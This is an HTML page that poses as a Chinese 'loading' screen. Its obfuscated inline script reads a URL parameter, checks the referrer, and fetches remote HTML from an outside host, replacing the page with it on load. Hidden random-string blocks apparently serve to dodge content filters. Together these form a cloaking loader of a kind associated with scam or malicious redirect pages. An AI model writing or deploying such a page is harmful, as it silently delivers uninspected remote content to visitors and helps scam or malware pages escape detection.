<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .sZuwWzYe67 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .sZuwWzYe67 .shvfcEf {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .sZuwWzYe67 .content {
            line-height: 50px;
            text-align: center
        }

        .sZuwWzYe67 .img {
            width: 100%
        }

        .sZuwWzYe67 .xyOd1CmEq {
            text-align: center
        }

        .sZuwWzYe67 .xyOd1CmEq span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .sZuwWzYe67 .xyOd1CmEq span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .sZuwWzYe67 .xyOd1CmEq span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .sZuwWzYe67 .xyOd1CmEq span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .sZuwWzYe67 .xyOd1CmEq span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .sZuwWzYe67 .xyOd1CmEq span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .sZuwWzYe67 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function ihue4PgiS(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var fSm5w = ihue4PgiS('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ fSm5w +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ fSm5w +".html?a=share";
		}
		
        u0qpbUUfes=url+"#"+new Date().getTime();
        u0qpbUUfes && function() {
            $.get(u0qpbUUfes, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>qGRDOuSEOMAzfAD</a>
<ul style='display:none' >KSMWsaQTOc0iMU8FYS9SrZHOMamVgQ84</ul>
<li style='display:none' >SDNl3yKthVwKoco4NB2jKxl2hP5</li>
<b style='display:none' >HYyhzJybjLerIJhaWXGlNq9PufTzsa8CjKQ8xVE8L0rij61mjUmN3wX8RDtrwwaFBuB</b>
<img  src='' style='display:none'>
<div style='display:none'>F45mhNhyNAO1I8faIsOF</div><div class="sZuwWzYe67">
    <div class="shvfcEf">
        <div class="xyOd1CmEq">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>kWwzYyXSDZAj4XzVkwvoiiCl06YiCz6EI6ZJptQzuAoL2wh8hVsvqdt6qQJrsN04rTQ63pDvmLStJ66l6c9fsFoTqECc9hmOT</span>
<li style='display:none' >co5s9McnIo0IyLuexhTJcIHg1x253I47l2sPLcjuvQtcDxgamA78kJEJ1FWK45ZlmY5Xez5PcoFY</li>
<div style='display:none'>mRqowVAu3uCN8h12xETAwVj6msTn2YsLjDdwo2jLkq4k3Clmt3G4C2dgncIoEAiahBkGLRHt9IDLVkCBRZONVXhnBAvy</div>
<img  src='' style='display:none'>
<div style='display:none'>mRqowVAu3uCN8h12xETAwVj6msTn2YsLjDdwo2jLkq4k3Clmt3G4C2dgncIoEAiahBkGLRHt9IDLVkCBRZONVXhnBAvy</div>
<p  style='display:none'>OunWNrPTiWijxIaOU6LfIX0JtOILz8xNK7GrTf2KKhN3Ta8vXVVSLCvqGeOCvO</p></body>
</html>